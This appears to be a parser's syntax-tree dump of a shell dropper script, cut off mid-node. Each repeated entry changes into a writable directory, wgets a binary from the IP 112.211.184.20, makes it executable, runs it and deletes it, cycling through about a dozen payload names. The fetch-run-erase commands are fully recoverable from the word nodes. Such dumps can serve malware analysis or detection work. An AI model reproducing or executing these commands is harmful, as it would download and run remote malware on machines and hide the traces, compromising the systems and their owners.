ListNode(lineno=2, pos=(12, 170), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 107), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 107), word='http://112.211.184.20/aaaaajalungka'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(107, 108)),
  CommandNode(lineno=2, pos=(109, 131), parts=[
    WordNode(lineno=2, pos=(109, 114), word='chmod'),
    WordNode(lineno=2, pos=(115, 117), word='+x'),
    WordNode(lineno=2, pos=(118, 131), word='aaaaajalungka'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(131, 132)),
  CommandNode(lineno=2, pos=(133, 148), parts=[
    WordNode(lineno=2, pos=(133, 148), word='./aaaaajalungka'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(148, 149)),
  CommandNode(lineno=2, pos=(150, 170), parts=[
    WordNode(lineno=2, pos=(150, 152), word='rm'),
    WordNode(lineno=2, pos=(153, 156), word='-rf'),
    WordNode(lineno=2, pos=(157, 170), word='aaaaajalungka'),
  ]),
])
ListNode(lineno=3, pos=(171, 325), parts=[
  CommandNode(lineno=3, pos=(171, 178), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 193), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 204), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(205, 207)),
  CommandNode(lineno=3, pos=(208, 216), parts=[
    WordNode(lineno=3, pos=(208, 210), word='cd'),
    WordNode(lineno=3, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(217, 219)),
  CommandNode(lineno=3, pos=(220, 224), parts=[
    WordNode(lineno=3, pos=(220, 222), word='cd'),
    WordNode(lineno=3, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 265), parts=[
    WordNode(lineno=3, pos=(226, 230), word='wget'),
    WordNode(lineno=3, pos=(231, 265), word='http://112.211.184.20/aaaaajamango'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(265, 266)),
  CommandNode(lineno=3, pos=(267, 288), parts=[
    WordNode(lineno=3, pos=(267, 272), word='chmod'),
    WordNode(lineno=3, pos=(273, 275), word='+x'),
    WordNode(lineno=3, pos=(276, 288), word='aaaaajamango'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(288, 289)),
  CommandNode(lineno=3, pos=(290, 304), parts=[
    WordNode(lineno=3, pos=(290, 304), word='./aaaaajamango'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(304, 305)),
  CommandNode(lineno=3, pos=(306, 325), parts=[
    WordNode(lineno=3, pos=(306, 308), word='rm'),
    WordNode(lineno=3, pos=(309, 312), word='-rf'),
    WordNode(lineno=3, pos=(313, 325), word='aaaaajamango'),
  ]),
])
ListNode(lineno=4, pos=(326, 488), parts=[
  CommandNode(lineno=4, pos=(326, 333), parts=[
    WordNode(lineno=4, pos=(326, 328), word='cd'),
    WordNode(lineno=4, pos=(329, 333), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(334, 336)),
  CommandNode(lineno=4, pos=(337, 348), parts=[
    WordNode(lineno=4, pos=(337, 339), word='cd'),
    WordNode(lineno=4, pos=(340, 348), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(349, 351)),
  CommandNode(lineno=4, pos=(352, 359), parts=[
    WordNode(lineno=4, pos=(352, 354), word='cd'),
    WordNode(lineno=4, pos=(355, 359), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(360, 362)),
  CommandNode(lineno=4, pos=(363, 371), parts=[
    WordNode(lineno=4, pos=(363, 365), word='cd'),
    WordNode(lineno=4, pos=(366, 371), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(372, 374)),
  CommandNode(lineno=4, pos=(375, 379), parts=[
    WordNode(lineno=4, pos=(375, 377), word='cd'),
    WordNode(lineno=4, pos=(378, 379), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(379, 380)),
  CommandNode(lineno=4, pos=(381, 422), parts=[
    WordNode(lineno=4, pos=(381, 385), word='wget'),
    WordNode(lineno=4, pos=(386, 422), word='http://112.211.184.20/aaaaajaopenggl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(422, 423)),
  CommandNode(lineno=4, pos=(424, 447), parts=[
    WordNode(lineno=4, pos=(424, 429), word='chmod'),
    WordNode(lineno=4, pos=(430, 432), word='+x'),
    WordNode(lineno=4, pos=(433, 447), word='aaaaajaopenggl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(447, 448)),
  CommandNode(lineno=4, pos=(449, 465), parts=[
    WordNode(lineno=4, pos=(449, 465), word='./aaaaajaopenggl'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(465, 466)),
  CommandNode(lineno=4, pos=(467, 488), parts=[
    WordNode(lineno=4, pos=(467, 469), word='rm'),
    WordNode(lineno=4, pos=(470, 473), word='-rf'),
    WordNode(lineno=4, pos=(474, 488), word='aaaaajaopenggl'),
  ]),
])
ListNode(lineno=5, pos=(489, 639), parts=[
  CommandNode(lineno=5, pos=(489, 496), parts=[
    WordNode(lineno=5, pos=(489, 491), word='cd'),
    WordNode(lineno=5, pos=(492, 496), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(497, 499)),
  CommandNode(lineno=5, pos=(500, 511), parts=[
    WordNode(lineno=5, pos=(500, 502), word='cd'),
    WordNode(lineno=5, pos=(503, 511), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(512, 514)),
  CommandNode(lineno=5, pos=(515, 522), parts=[
    WordNode(lineno=5, pos=(515, 517), word='cd'),
    WordNode(lineno=5, pos=(518, 522), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(523, 525)),
  CommandNode(lineno=5, pos=(526, 534), parts=[
    WordNode(lineno=5, pos=(526, 528), word='cd'),
    WordNode(lineno=5, pos=(529, 534), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(535, 537)),
  CommandNode(lineno=5, pos=(538, 542), parts=[
    WordNode(lineno=5, pos=(538, 540), word='cd'),
    WordNode(lineno=5, pos=(541, 542), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(542, 543)),
  CommandNode(lineno=5, pos=(544, 582), parts=[
    WordNode(lineno=5, pos=(544, 548), word='wget'),
    WordNode(lineno=5, pos=(549, 582), word='http://112.211.184.20/aaaaajavast'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(582, 583)),
  CommandNode(lineno=5, pos=(584, 604), parts=[
    WordNode(lineno=5, pos=(584, 589), word='chmod'),
    WordNode(lineno=5, pos=(590, 592), word='+x'),
    WordNode(lineno=5, pos=(593, 604), word='aaaaajavast'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(604, 605)),
  CommandNode(lineno=5, pos=(606, 619), parts=[
    WordNode(lineno=5, pos=(606, 619), word='./aaaaajavast'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(619, 620)),
  CommandNode(lineno=5, pos=(621, 639), parts=[
    WordNode(lineno=5, pos=(621, 623), word='rm'),
    WordNode(lineno=5, pos=(624, 627), word='-rf'),
    WordNode(lineno=5, pos=(628, 639), word='aaaaajavast'),
  ]),
])
ListNode(lineno=6, pos=(640, 798), parts=[
  CommandNode(lineno=6, pos=(640, 647), parts=[
    WordNode(lineno=6, pos=(640, 642), word='cd'),
    WordNode(lineno=6, pos=(643, 647), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(648, 650)),
  CommandNode(lineno=6, pos=(651, 662), parts=[
    WordNode(lineno=6, pos=(651, 653), word='cd'),
    WordNode(lineno=6, pos=(654, 662), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(663, 665)),
  CommandNode(lineno=6, pos=(666, 673), parts=[
    WordNode(lineno=6, pos=(666, 668), word='cd'),
    WordNode(lineno=6, pos=(669, 673), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(674, 676)),
  CommandNode(lineno=6, pos=(677, 685), parts=[
    WordNode(lineno=6, pos=(677, 679), word='cd'),
    WordNode(lineno=6, pos=(680, 685), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(686, 688)),
  CommandNode(lineno=6, pos=(689, 693), parts=[
    WordNode(lineno=6, pos=(689, 691), word='cd'),
    WordNode(lineno=6, pos=(692, 693), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(693, 694)),
  CommandNode(lineno=6, pos=(695, 735), parts=[
    WordNode(lineno=6, pos=(695, 699), word='wget'),
    WordNode(lineno=6, pos=(700, 735), word='http://112.211.184.20/aaaaajagreyps'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(735, 736)),
  CommandNode(lineno=6, pos=(737, 759), parts=[
    WordNode(lineno=6, pos=(737, 742), word='chmod'),
    WordNode(lineno=6, pos=(743, 745), word='+x'),
    WordNode(lineno=6, pos=(746, 759), word='aaaaajagreyps'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(759, 760)),
  CommandNode(lineno=6, pos=(761, 776), parts=[
    WordNode(lineno=6, pos=(761, 776), word='./aaaaajagreyps'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(776, 777)),
  CommandNode(lineno=6, pos=(778, 798), parts=[
    WordNode(lineno=6, pos=(778, 780), word='rm'),
    WordNode(lineno=6, pos=(781, 784), word='-rf'),
    WordNode(lineno=6, pos=(785, 798), word='aaaaajagreyps'),
  ]),
])
ListNode(lineno=7, pos=(799, 957), parts=[
  CommandNode(lineno=7, pos=(799, 806), parts=[
    WordNode(lineno=7, pos=(799, 801), word='cd'),
    WordNode(lineno=7, pos=(802, 806), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(807, 809)),
  CommandNode(lineno=7, pos=(810, 821), parts=[
    WordNode(lineno=7, pos=(810, 812), word='cd'),
    WordNode(lineno=7, pos=(813, 821), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(822, 824)),
  CommandNode(lineno=7, pos=(825, 832), parts=[
    WordNode(lineno=7, pos=(825, 827), word='cd'),
    WordNode(lineno=7, pos=(828, 832), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(833, 835)),
  CommandNode(lineno=7, pos=(836, 844), parts=[
    WordNode(lineno=7, pos=(836, 838), word='cd'),
    WordNode(lineno=7, pos=(839, 844), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(845, 847)),
  CommandNode(lineno=7, pos=(848, 852), parts=[
    WordNode(lineno=7, pos=(848, 850), word='cd'),
    WordNode(lineno=7, pos=(851, 852), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(852, 853)),
  CommandNode(lineno=7, pos=(854, 894), parts=[
    WordNode(lineno=7, pos=(854, 858), word='wget'),
    WordNode(lineno=7, pos=(859, 894), word='http://112.211.184.20/aaaaajakuhamo'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(894, 895)),
  CommandNode(lineno=7, pos=(896, 918), parts=[
    WordNode(lineno=7, pos=(896, 901), word='chmod'),
    WordNode(lineno=7, pos=(902, 904), word='+x'),
    WordNode(lineno=7, pos=(905, 918), word='aaaaajakuhamo'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(918, 919)),
  CommandNode(lineno=7, pos=(920, 935), parts=[
    WordNode(lineno=7, pos=(920, 935), word='./aaaaajakuhamo'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(935, 936)),
  CommandNode(lineno=7, pos=(937, 957), parts=[
    WordNode(lineno=7, pos=(937, 939), word='rm'),
    WordNode(lineno=7, pos=(940, 943), word='-rf'),
    WordNode(lineno=7, pos=(944, 957), word='aaaaajakuhamo'),
  ]),
])
ListNode(lineno=8, pos=(958, 1112), parts=[
  CommandNode(lineno=8, pos=(958, 965), parts=[
    WordNode(lineno=8, pos=(958, 960), word='cd'),
    WordNode(lineno=8, pos=(961, 965), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(966, 968)),
  CommandNode(lineno=8, pos=(969, 980), parts=[
    WordNode(lineno=8, pos=(969, 971), word='cd'),
    WordNode(lineno=8, pos=(972, 980), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(981, 983)),
  CommandNode(lineno=8, pos=(984, 991), parts=[
    WordNode(lineno=8, pos=(984, 986), word='cd'),
    WordNode(lineno=8, pos=(987, 991), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(992, 994)),
  CommandNode(lineno=8, pos=(995, 1003), parts=[
    WordNode(lineno=8, pos=(995, 997), word='cd'),
    WordNode(lineno=8, pos=(998, 1003), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1004, 1006)),
  CommandNode(lineno=8, pos=(1007, 1011), parts=[
    WordNode(lineno=8, pos=(1007, 1009), word='cd'),
    WordNode(lineno=8, pos=(1010, 1011), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1011, 1012)),
  CommandNode(lineno=8, pos=(1013, 1052), parts=[
    WordNode(lineno=8, pos=(1013, 1017), word='wget'),
    WordNode(lineno=8, pos=(1018, 1052), word='http://112.211.184.20/aaaaajamarco'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1052, 1053)),
  CommandNode(lineno=8, pos=(1054, 1075), parts=[
    WordNode(lineno=8, pos=(1054, 1059), word='chmod'),
    WordNode(lineno=8, pos=(1060, 1062), word='+x'),
    WordNode(lineno=8, pos=(1063, 1075), word='aaaaajamarco'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1075, 1076)),
  CommandNode(lineno=8, pos=(1077, 1091), parts=[
    WordNode(lineno=8, pos=(1077, 1091), word='./aaaaajamarco'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1091, 1092)),
  CommandNode(lineno=8, pos=(1093, 1112), parts=[
    WordNode(lineno=8, pos=(1093, 1095), word='rm'),
    WordNode(lineno=8, pos=(1096, 1099), word='-rf'),
    WordNode(lineno=8, pos=(1100, 1112), word='aaaaajamarco'),
  ]),
])
ListNode(lineno=9, pos=(1113, 1271), parts=[
  CommandNode(lineno=9, pos=(1113, 1120), parts=[
    WordNode(lineno=9, pos=(1113, 1115), word='cd'),
    WordNode(lineno=9, pos=(1116, 1120), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1121, 1123)),
  CommandNode(lineno=9, pos=(1124, 1135), parts=[
    WordNode(lineno=9, pos=(1124, 1126), word='cd'),
    WordNode(lineno=9, pos=(1127, 1135), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1136, 1138)),
  CommandNode(lineno=9, pos=(1139, 1146), parts=[
    WordNode(lineno=9, pos=(1139, 1141), word='cd'),
    WordNode(lineno=9, pos=(1142, 1146), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1147, 1149)),
  CommandNode(lineno=9, pos=(1150, 1158), parts=[
    WordNode(lineno=9, pos=(1150, 1152), word='cd'),
    WordNode(lineno=9, pos=(1153, 1158), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1159, 1161)),
  CommandNode(lineno=9, pos=(1162, 1166), parts=[
    WordNode(lineno=9, pos=(1162, 1164), word='cd'),
    WordNode(lineno=9, pos=(1165, 1166), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1166, 1167)),
  CommandNode(lineno=9, pos=(1168, 1208), parts=[
    WordNode(lineno=9, pos=(1168, 1172), word='wget'),
    WordNode(lineno=9, pos=(1173, 1208), word='http://112.211.184.20/aaaaajachikos'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1208, 1209)),
  CommandNode(lineno=9, pos=(1210, 1232), parts=[
    WordNode(lineno=9, pos=(1210, 1215), word='chmod'),
    WordNode(lineno=9, pos=(1216, 1218), word='+x'),
    WordNode(lineno=9, pos=(1219, 1232), word='aaaaajachikos'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1232, 1233)),
  CommandNode(lineno=9, pos=(1234, 1249), parts=[
    WordNode(lineno=9, pos=(1234, 1249), word='./aaaaajachikos'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1249, 1250)),
  CommandNode(lineno=9, pos=(1251, 1271), parts=[
    WordNode(lineno=9, pos=(1251, 1253), word='rm'),
    WordNode(lineno=9, pos=(1254, 1257), word='-rf'),
    WordNode(lineno=9, pos=(1258, 1271), word='aaaaajachikos'),
  ]),
])
ListNode(lineno=10, pos=(1272, 1434), parts=[
  CommandNode(lineno=10, pos=(1272, 1279), parts=[
    WordNode(lineno=10, pos=(1272, 1274), word='cd'),
    WordNode(lineno=10, pos=(1275, 1279), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1280, 1282)),
  CommandNode(lineno=10, pos=(1283, 1294), parts=[
    WordNode(lineno=10, pos=(1283, 1285), word='cd'),
    WordNode(lineno=10, pos=(1286, 1294), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1295, 1297)),
  CommandNode(lineno=10, pos=(1298, 1305), parts=[
    WordNode(lineno=10, pos=(1298, 1300), word='cd'),
    WordNode(lineno=10, pos=(1301, 1305), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1306, 1308)),
  CommandNode(lineno=10, pos=(1309, 1317), parts=[
    WordNode(lineno=10, pos=(1309, 1311), word='cd'),
    WordNode(lineno=10, pos=(1312, 1317), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1318, 1320)),
  CommandNode(lineno=10, pos=(1321, 1325), parts=[
    WordNode(lineno=10, pos=(1321, 1323), word='cd'),
    WordNode(lineno=10, pos=(1324, 1325), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1325, 1326)),
  CommandNode(lineno=10, pos=(1327, 1368), parts=[
    WordNode(lineno=10, pos=(1327, 1331), word='wget'),
    WordNode(lineno=10, pos=(1332, 1368), word='http://112.211.184.20/aaaaajapchikos'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1368, 1369)),
  CommandNode(lineno=10, pos=(1370, 1393), parts=[
    WordNode(lineno=10, pos=(1370, 1375), word='chmod'),
    WordNode(lineno=10, pos=(1376, 1378), word='+x'),
    WordNode(lineno=10, pos=(1379, 1393), word='aaaaajapchikos'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1393, 1394)),
  CommandNode(lineno=10, pos=(1395, 1411), parts=[
    WordNode(lineno=10, pos=(1395, 1411), word='./aaaaajapchikos'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1411, 1412)),
  CommandNode(lineno=10, pos=(1413, 1434), parts=[
    WordNode(lineno=10, pos=(1413, 1415), word='rm'),
    WordNode(lineno=10, pos=(1416, 1419), word='-rf'),
    WordNode(lineno=10, pos=(1420, 1434), word='aaaaajapchikos'),
  ]),
])
ListNode(lineno=11, pos=(1435, 1581), parts=[
  CommandNode(lineno=11, pos=(1435, 1442), parts=[
    WordNode(lineno=11, pos=(1435, 1437), word='cd'),
    WordNode(lineno=11, pos=(1438, 1442), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1443, 1445)),
  CommandNode(lineno=11, pos=(1446, 1457), parts=[
    WordNode(lineno=11, pos=(1446, 1448), word='cd'),
    WordNode(lineno=11, pos=(1449, 1457), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1458, 1460)),
  CommandNode(lineno=11, pos=(1461, 1468), parts=[
    WordNode(lineno=11, pos=(1461, 1463), word='cd'),
    WordNode(lineno=11, pos=(1464, 1468), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1469, 1471)),
  CommandNode(lineno=11, pos=(1472, 1480), parts=[
    WordNode(lineno=11, pos=(1472, 1474), word='cd'),
    WordNode(lineno=11, pos=(1475, 1480), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1481, 1483)),
  CommandNode(lineno=11, pos=(1484, 1488), parts=[
    WordNode(lineno=11, pos=(1484, 1486), word='cd'),
    WordNode(lineno=11, pos=(1487, 1488), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1488, 1489)),
  CommandNode(lineno=11, pos=(1490, 1527), parts=[
    WordNode(lineno=11, pos=(1490, 1494), word='wget'),
    WordNode(lineno=11, pos=(1495, 1527), word='http://112.211.184.20/aaaaajacos'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1527, 1528)),
  CommandNode(lineno=11, pos=(1529, 1548), parts=[
    WordNode(lineno=11, pos=(1529, 1534), word='chmod'),
    WordNode(lineno=11, pos=(1535, 1537), word='+x'),
    WordNode(lineno=11, pos=(1538, 1548), word='aaaaajacos'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1548, 1549)),
  CommandNode(lineno=11, pos=(1550, 1562), parts=[
    WordNode(lineno=11, pos=(1550, 1562), word='./aaaaajacos'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1562, 1563)),
  CommandNode(lineno=11, pos=(1564, 1581), parts=[
    WordNode(lineno=11, pos=(1564, 1566), word='rm'),
    WordNode(lineno=11, pos=(1567, 1570), word='-rf'),
    WordNode(lineno=11, pos=(1571, 1581), word='aaaaajacos'),
  ]),
])
ListNode(lineno=12, pos=(1582, 1700), parts=[
  CommandNode(lineno=12, pos=(1582, 1589), parts=[
    WordNode(lineno=12, pos=(1582, 1584), word='cd'),
    WordNode(lineno=12, pos=(1585, 1589), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1590, 1592)),
  CommandNode(lineno=12, pos=(1593, 1604), parts=[
    WordNode(lineno=12, pos=(1593, 1595), word='cd'),
    WordNode(lineno=12, pos=(1596, 1604), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1605, 1607)),
  CommandNode(lineno=12, pos=(1608, 1615), parts=[
    WordNode(lineno=12, pos=(1608, 1610), word='cd'),
    WordNode(lineno=12, pos=(1611, 1615), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1616, 1618)),
  CommandNode(lineno=12, pos=(1619, 1627), parts=[
    WordNode(lineno=12, pos=(1619, 1621), word='cd'),
    WordNode(lineno=12, pos=(1622, 1627), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1628, 1630)),
  CommandNode(lineno=12, pos=(1631, 1635), parts=[
    WordNode(lineno=12, pos=(1631, 1633), word='cd'),
    WordNode(lineno=12, pos=(1634, 1635), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1635, 1636)),
  CommandNode(lineno=12, pos=(1637, 1667), parts=[
    WordNode(lineno=12, pos=(1637, 1641), word='wget'),
    WordNode(lineno=12, pos=(1642, 1667), word='http://112.211.184.20/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1667, 1668)),
  CommandNode(lineno=12, pos=(1669, 1681), parts=[
    WordNode(lineno=12, pos=(1669, 1674), word='chmod'),
    WordNode(lineno=12, pos=(1675, 1677), word='+x'),
    WordNode(lineno=12, pos=(1678, 1681), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1681, 1682)),
  CommandNode(lineno=12, pos=(1683, 1688), parts=[
    WordNode(lineno=12, pos=(1683, 1688), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1688, 1689)),
  CommandNode(lineno=12, pos=(1690, 1700), parts=[
    WordNode(lineno=12, pos=(1690, 1692), word='rm'),
    WordNode(lineno=12, pos=(1693, 1696), word='-rf'),
    WordNode(lineno=12, pos=(1697, 1700), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1701, 1871), parts=[
  CommandNode(lineno=13, pos=(1701, 1708), parts=[
    WordNode(lineno=13, pos=(1701, 1703), word='cd'),
    WordNode(lineno=13, pos=(1704, 1708), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1709, 1711)),
  CommandNode(lineno=13, pos=(1712, 1723), parts=[
    WordNode(lineno=13, pos=(1712, 1714), word='cd'),
    WordNode(lineno=13, pos=(1715, 1723), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1724, 1726)),
  CommandNode(lineno=13, pos=(1727, 1734), parts=[
    WordNode(lineno=13, pos=(1727, 1729), word='cd'),
    WordNode(lineno=13, pos=(1730, 1734), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1735, 1737)),
  CommandNode(lineno=13, pos=(1738, 1746), parts=[
    WordNode(lineno=13, pos=(1738, 1740), word='cd'),
    WordNode(lineno=13, pos=(1741, 1746), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1747, 1749)),
  CommandNode(lineno=13, pos=(1750, 1754), parts=[
    WordNode(lineno=13, pos=(1750, 1752), word='cd'),
    WordNode(lineno=13, pos=(1753, 1754), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1754, 1755)),
  CommandNode(lineno=13, pos=(1756, 1799), parts=[
    WordNode(lineno=13, pos=(1756, 1760), word='wget'),
    WordNode(lineno=13, pos=(1761, 1799), word='http://112.211.184.20/aaaaajafacebook3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1799, 1800)),
  CommandNode(lineno=13, pos=(1801, 1826), parts=[
    WordNode(lineno=13, pos=(1801, 1806), word='chmod'),
    WordNode(lineno=13, pos=(1807, 1809), word='+x'),
    WordNode(lineno=13, pos=(1810, 1826), word='aaaaajafacebook3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1826, 1827)),
  CommandNode(lineno=13, pos=(1828, 1846), parts=[
    WordNode(lineno=13, pos=(1828, 1846), word='./aaaaajafacebook3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1846, 1847)),
  CommandNode(lineno=13, pos=(1848, 1871), parts=[
    WordNode(lineno=13, pos=(1848, 1850), word='rm'),
    WordNode(lineno=13, pos=(1851, 1854), word='-rf'),
    WordNode(lineno=13, pos=(1855, 1871), word='aaaaajafacebook3'),
  ]),
])
ListNode(lineno=14, pos=(1872, 2038), parts=[
  CommandNode(lineno=14, pos=(1872, 1879), parts=[
    WordNode(lineno=14, pos=(1872, 1874), word='cd'),
    WordNode(lineno=14, pos=(1875, 1879), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1880, 1882)),
  CommandNode(lineno=14, pos=(1883, 1894), parts=[
    WordNode(lineno=14, pos=(1883, 1885), word='cd'),
    WordNode(lineno=14, pos=(1886, 1894), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1895, 1897)),
  CommandNode(lineno=14, pos=(1898, 1905), parts=[
    WordNode(lineno=14, pos=(1898, 1900), word='cd'),
    WordNode(lineno=14, pos=(1901, 1905), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1906, 1908)),
  CommandNode(lineno=14, pos=(1909, 1917), parts=[
    WordNode(lineno=14, pos=(1909, 1911), word='cd'),
    WordNode(lineno=14, pos=(1912, 1917), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1918, 1920)),
  CommandNode(lineno=14, pos=(1921, 1925), parts=[
    WordNode(lineno=14, pos=(1921, 1923), word='cd'),
    WordNode(lineno=14, pos=(1924, 1925), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1925, 1926)),
  CommandNode(lineno=14, pos=(1927, 1969), parts=[
    WordNode(lineno=14, pos=(1927, 1931), word='wget'),
    WordNode(lineno=14, pos=(1932, 1969), word='http://112.211.184.20/aaaaajanetdelds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1969, 1970)),
  CommandNode(lineno=14, pos=(1971, 1995), parts=[
    WordNode(lineno=14, pos=(1971, 1976), word='chmod'),
    WordNode(lineno=14, pos=(1977, 1979), word='+x'),
    WordNode(lineno=14, pos=(1980, 1995), word='aaaaajanetdelds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1995, 1996)),
  CommandNode(lineno=14, pos=(1997, 2014), parts=[
    WordNode(lineno=14, pos=(1997, 2014), word='./aaaaajanetdelds'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2014, 2015)),
  CommandNode(lineno=14, pos=(2016, 2038), parts=[
    WordNode(lineno=14, pos=(2016, 2018), word='rm'),
